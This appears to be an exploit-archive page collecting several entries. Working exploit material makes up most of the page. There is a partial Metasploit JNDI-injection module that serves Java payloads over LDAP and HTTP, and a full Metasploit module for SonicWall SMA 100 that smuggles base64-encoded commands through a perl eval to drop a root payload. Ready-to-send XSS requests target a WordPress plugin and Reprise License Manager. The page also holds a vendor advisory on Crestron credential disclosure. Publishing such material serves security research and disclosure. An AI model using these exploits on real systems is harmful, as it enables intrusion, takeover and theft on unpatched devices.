datastore['HTTP_HEADER'].blank?<br /> targetinfo = (@checkcode&.details || []).reject { |ti| ti[:headers]&.empty? }.first<br /> http_header = targetinfo[:headers].keys.first if targetinfo<br /> fail_with(Failure::BadConfig, 'No HTTP_HEADER was specified and none were found automatically') unless http_header<br /><br /> print_good("Automatically identified vulnerable header: #{http_header}")<br /> else<br /> http_header = datastore['HTTP_HEADER']<br /> end<br /><br /> # LDAP service<br /> start_service<br /> # HTTP service<br /> start_http_service if target['RemoteLoad']<br /> # HTTP request initiator<br /> send_request_raw(<br /> 'uri' => normalize_uri(target_uri),<br /> 'method' => datastore['HTTP_METHOD'],<br /> 'headers' => { http_header => jndi_string }<br /> )<br /> sleep(datastore['WfsDelay'])<br /> handler<br /> ensure<br /> cleanup<br /> end<br /><br /> #<br /> # Kill HTTP & LDAP services (shut them down and clear resources)<br /> #<br /> def cleanup<br /> # Clean and stop HTTP server<br /> if @http_service<br /> begin<br /> @http_service.remove_resource(datastore['URIPATH'])<br /> @http_service.deref<br /> @http_service.stop<br /> @http_service = nil<br /> rescue StandardError => e<br /> print_error("Failed to stop http server due to #{e}")<br /> end<br /> end<br /> super<br /> end<br /><br /> private<br /><br /> # Boilerplate HTTP service code<br /> #<br /> # Returns the configured (or random, if not configured) URI path<br /> #<br /> def resource_uri<br /> path = datastore['URIPATH'] || rand_text_alphanumeric(rand(8..15)) + '.jar'<br /> path = '/' + path if path !~ %r{^/}<br /> if path !~ /\.jar$/<br /> print_status("Appending .jar extension to #{path} as we don't yet serve classpaths")<br /> path += '.jar'<br /> end<br /> datastore['URIPATH'] = path<br /> return path<br /> end<br /><br /> #<br /> # Handle the HTTP request and return a response. Code borrowed from:<br /> # msf/core/exploit/http/server.rb<br /> #<br /> def start_http_service(opts = {})<br /> comm = datastore['ListenerComm']<br /> if (comm.to_s == 'local')<br /> comm = ::Rex::Socket::Comm::Local<br /> else<br /> comm = nil<br /> end<br /> # Default the server host / port<br /> opts = {<br /> 'ServerHost' => datastore['SRVHOST'],<br /> 'ServerPort' => datastore['HTTP_SRVPORT'],<br /> 'Comm' => comm<br /> }.update(opts)<br /> # Start a new HTTP server<br /> @http_service = Rex::ServiceManager.start(<br /> Rex::Proto::Http::Server,<br /> opts['ServerPort'].to_i,<br /> opts['ServerHost'],<br /> datastore['SSL'],<br /> {<br /> 'Msf' => framework,<br /> 'MsfExploit' => self<br /> },<br /> opts['Comm'],<br /> datastore['SSLCert']<br /> )<br /> @http_service.server_name = datastore['HTTP::server_name']<br /> # Default the procedure of the URI to on_request_uri if one isn't<br /> # provided.<br /> uopts = {<br /> 'Proc' => method(:on_request_uri),<br /> 'Path' => resource_uri<br /> }.update(opts['Uri'] || {})<br /> proto = (datastore['SSL'] ? 'https' : 'http')<br /> print_status("Serving Java code on: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")<br /> if (opts['ServerHost'] == '0.0.0.0')<br /> print_status(" Local IP: #{proto}://#{Rex::Socket.source_address}:#{opts['ServerPort']}#{uopts['Path']}")<br /> end<br /> # Add path to resource<br /> @service_path = uopts['Path']<br /> @http_service.add_resource(uopts['Path'], uopts)<br /> end<br /><br /> def validate_configuration!<br /> fail_with(Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') if ['0.0.0.0', '::'].include?(datastore['SRVHOST'])<br /> if datastore['HTTP_HEADER'].blank? && !datastore['AutoCheck']<br /> fail_with(Failure::BadConfig, 'Either the AutoCheck option must be enabled or an HTTP_HEADER must be specified.')<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Advisory: Credential Disclosure in Web Interface of Crestron Device<br /><br /><br />When the administrative web interface of the Crestron HDMI switcher is<br />accessed unauthenticated, user credentials are disclosed which are valid<br />to authenticate to the web interface.<br /><br />Details<br />=======<br /><br />Product: Crestron HD-MD4X2-4K-E<br />Affected Versions: 1.0.0.2159<br />Fixed Versions: -<br />Vulnerability Type: Information Disclosure<br />Security Risk: high<br />Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E<br />Vendor Status: decided not to fix<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009<br />Advisory Status: published<br />CVE: CVE-2022-23178<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178<br /><br /><br />Introduction<br />============<br /><br />"Crestron sets the gold standard for network security by leveraging the<br />most advanced technologies including 802.1x authentication, AES<br />encryption, Active Directory® credential management, JITC Certification,<br />SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to<br />provide network security at the product level."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />Upon visiting the device's web interface using a web browser, a login<br />form is displayed requiring to enter username and password to<br />authenticate. The analysis of sent HTTP traffic revealed that in<br />addition to the loading of the website, a few more HTTP requests are<br />automatically triggered. One of the associated responses contains a<br />username and a password which can be used to authenticate as the<br />affected user.<br /><br /><br />Proof of Concept<br />================<br /><br />Requesting the URL "http://crestron.example.com/" via a web browser<br />results in multiple HTTP requests being sent. Among others, the<br />following URL is requested:<br /><br />------------------------------------------------------------------------<br />http://crestron.example.com/aj.html?a=devi&_=[...]<br />------------------------------------------------------------------------<br /><br />This request results in a response similar to the following:<br /><br />------------------------------------------------------------------------<br />HTTP/1.0 200 OK<br />Cache-Control: no-cache<br />Content-type: text/html<br /><br />{<br /> "login_ur": 0,<br /> "front_val": [<br /> 0,<br /> 1<br /> ],<br /> "uname": "admin",<br /> "upassword": "password"<br />}<br />------------------------------------------------------------------------<br /><br />The values for the keys "uname" and "upassword" could be used to<br />successfully authenticate to the web interface as the affected user.<br /><br /><br />Workaround<br />==========<br /><br />Reachability over the network can be restricted for access to the web<br />interface, for example by using a firewall.<br /><br /><br />Fix<br />===<br /><br />No fix known.<br /><br /><br />Security Risk<br />=============<br /><br />As user credentials are disclosed to visitors of the web interface they<br />can directly be used to authenticate to it. The access allows to modify<br />the device's input and output settings as well as to upload and install<br />new firmware. Due to ease of exploitation and gain of administrative<br />access this vulnerability poses a high risk.<br /><br /><br />Timeline<br />========<br /><br />2021-10-06 Vulnerability identified<br />2021-11-15 Customer approved disclosure to vendor<br />2021-12-08 Vendor notified<br />2021-12-15 Vendor notified again<br />2021-12-21 Vendor response received: "The device in question doesn't support<br /> Crestron's security practices. We recommend the HD-MD-4KZ alternative."<br />2021-12-22 Requested confirmation, that the vulnerability will not be addressed.<br />2021-12-28 Vendor confirms that the vulnerability will not be corrected.<br />2022-01-12 Advisory released<br /><br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://www.redteam-pentesting.de/jobs/<br /><br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Dennewartstr. 25-27 Fax : +49 241 510081-99<br />52068 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)<br /># Date: 10/01/2022<br /># Exploit Author: Veshraj Ghimire<br /># Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/<br /># Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/<br /># Version: 1.3.2<br /># Tested on: Windows 10 - Chrome, WordPress 5.8.2<br /># CVE : CVE-2021-24563<br /><br /># References:<br /><br />https://www.youtube.com/watch?v=lfrLoHl4-Zs<br />https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1<br /><br /># Description:<br /><br />The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly<br /><br /><br /># Proof Of Concept:<br /><br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br /><br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /><br />Accept-Language: en-GB,en;q=0.5<br /><br />Accept-Encoding: gzip, deflate<br /><br />Content-Type: multipart/form-data;<br />boundary=---------------------------124662954015823207281179831654<br /><br />Content-Length: 1396<br /><br />Connection: close<br /><br />Upgrade-Insecure-Requests: 1<br /><br /><br />-----------------------------124662954015823207281179831654<br /><br />Content-Disposition: form-data; name="post_ID"<br /><br /><br />1247<br /><br />-----------------------------124662954015823207281179831654<br /><br />Content-Disposition: form-data; name="post_title"<br /><br /><br />test<br /><br />-----------------------------124662954015823207281179831654<br /><br />Content-Disposition: form-data; name="post_content"<br /><br /><br />test<br /><br />-----------------------------124662954015823207281179831654<br /><br />Content-Disposition: form-data; name="files[]"; filename="xss.html"<br /><br />Content-Type: text/html<br /><br /><br /><script>alert(/XSS/)</script><br /><br />-----------------------------124662954015823207281179831654<br /><br />Content-Disposition: form-data; name="action"<br /><br /><br />upload_ugc<br /><br />-----------------------------124662954015823207281179831654<br /><br />Content-Disposition: form-data; name="form_layout"<br /><br /><br />image<br /><br />-----------------------------124662954015823207281179831654<br /><br />Content-Disposition: form-data; name="fu_nonce"<br /><br /><br />021fb612f9<br /><br />-----------------------------124662954015823207281179831654<br /><br />Content-Disposition: form-data; name="_wp_http_referer"<br /><br /><br />/wordpress/frontend-uploader-form/<br /><br />-----------------------------124662954015823207281179831654<br /><br />Content-Disposition: form-data; name="ff"<br /><br /><br />92b6cbfa6120e13ff1654e28cef2a271<br /><br />-----------------------------124662954015823207281179831654<br /><br />Content-Disposition: form-data; name="form_post_id"<br /><br /><br />1247<br /><br />-----------------------------124662954015823207281179831654--<br /><br /><br /><br />Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'SonicWall SMA 100 Series Authenticated Command Injection',<br /> 'Description' => %q{<br /> This module exploits an authenticated command injection vulnerability<br /> in the SonicWall SMA 100 series web interface. Exploitation results in<br /> command execution as root. The affected versions are:<br /><br /> - 10.2.1.2-24sv and below<br /> - 10.2.0.8-37sv and below<br /> - 9.0.0.11-31sv and below<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'jbaines-r7' # Vulnerability discovery and Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2021-20039' ],<br /> [ 'URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026'],<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2'],<br /> [ 'URL', 'https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis']<br /> ],<br /> 'DisclosureDate' => '2021-12-14',<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_X86],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'echo', 'printf' ]<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'PrependFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),<br /> OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),<br /> OptString.new('SWDOMAIN', [true, 'The domain to log in to', 'LocalDomain']),<br /> OptString.new('PORTALNAME', [true, 'The portal to log in to', 'VirtualOffice'])<br /> ])<br /> end<br /><br /> ##<br /> # Extract the version number from a javascript include in the login landing page.<br /> # And compare the version against known affected. Affected versions are:<br /> #<br /> # 10.2.1.2-24sv and below<br /> # 10.2.0.8-37sv and below<br /> # 9.0.0.11-31sv and below<br /> ##<br /> def check<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/welcome'),<br /> 'agent' => 'SonicWALL Mobile Connect'<br /> })<br /> return CheckCode::Unknown('Failed to retrieve the version information') unless res&.code == 200<br /><br /> version = res.body.match(/\.([0-9.\-a-z]+)\.js" type=/)<br /> return CheckCode::Unknown('Failed to retrieve the version information') unless version<br /><br /> version = version[1]<br /><br /> major, minor, revision, build = version.split('.', 4)<br /> build, point = build.split('-', 2)<br /> print_status("Version found: #{major}.#{minor}.#{revision}.#{build}-#{point}")<br /> point.delete_suffix('sv')<br /><br /> case major<br /> when '9'<br /> return CheckCode::Safe unless minor.to_i == 0 && revision.to_i == 0 && build.to_i <= 11 && point.to_i <= 31<br /> when '10'<br /> return CheckCode::Safe unless minor.to_i == 2<br /><br /> case revision<br /> when '0'<br /> return CheckCode::Safe unless build.to_i <= 8 && point.to_i <= 37<br /> when '1'<br /> return CheckCode::Safe unless build.to_i <= 2 && point.to_i <= 24<br /> else<br /> return CheckCode::Safe<br /> end<br /> else<br /> return CheckCode::Safe<br /> end<br /> CheckCode::Appears('Based on the discovered version.')<br /> end<br /><br /> def login<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/userLogin'),<br /> 'agent' => 'SonicWALL Mobile Connect',<br /> 'vars_post' =><br /> {<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'domain' => datastore['SWDOMAIN'],<br /> 'portalname' => datastore['PORTALNAME'],<br /> 'login' => 'true',<br /> 'verifyCert' => '0',<br /> 'ajax' => 'true'<br /> },<br /> 'keep_cookies' => true<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200<br /> fail_with(Failure::NoAccess, 'Login failed') unless res.get_cookies.include?('swap=')<br /> print_good('Authentication successful')<br /> end<br /><br /> ##<br /> # Send the exploit in the "CERT" field when "deleting" a certificate. The<br /> # backend requires the payload start with "n". Also, there is a very small<br /> # amount of space to fit the command into (otherwise we'll trigger a bof).<br /> # Finally! The command has a lot of disallowed characters: /$&|>;`^. Which<br /> # is problematically for basically all the payloads. The system also is<br /> # missing useful tools like wget, base64, and curl (10.2 has curl but<br /> # whatever). As such, it seemed the easiest thing to do is wrap the entire<br /> # command in base64 and then use perl to decode/execute it.<br /> ##<br /> def execute_command(cmd, _opts = {})<br /> cmd_encoded = Rex::Text.encode_base64(cmd)<br /> perl_eval = "n\nperl -MMIME::Base64 -e 'system(decode_base64(\"#{cmd_encoded}\"))'"<br /><br /> multipart_form = Rex::MIME::Message.new<br /> multipart_form.add_part('delete', nil, nil, 'form-data; name="buttontype"')<br /> multipart_form.add_part(perl_eval, nil, nil, 'form-data; name="CERT"')<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/viewcert'),<br /> 'agent' => 'SonicWALL Mobile Connect',<br /> 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",<br /> 'data' => multipart_form.to_s<br /> }, 5)<br /><br /> if res && res.code != 200<br /> # the response should always be 200, unless meterpreter holds the<br /> # connection open.<br /> fail_with(Failure::UnexpectedReply, 'Only expected 200 OK')<br /> end<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> login<br /> execute_cmdstager(linemax: 40)<br /> end<br />end<br /></code></pre>
<pre><code># Product: RLM 14.2<br /># Vendor: Reprise Software<br /># CVE ID: CVE-2021-45422<br /># Vulnerability Title: Reflected Cross-Site Scripting<br /># Severity: Medium<br /># Author(s): Giulia Melotti Garibaldi<br /># Date: 2022-01-11<br />#<br />#############################################################<br />Introduction:<br />An issue was discovered in Reprise License Manager 14.2, Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/activate_process "count" parameter via GET. No authentication is required.<br /><br />Vulnerability PoC:<br /><br />GET http://HOST:5054/goform/activate_process?isv=&akey=&hostid=&count=%3Cscript%3Ealert(%221%22)%3C/script%3E HTTP/1.1<br />Host: HOST:5054<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Connection: keep-alive<br /><br /></code></pre>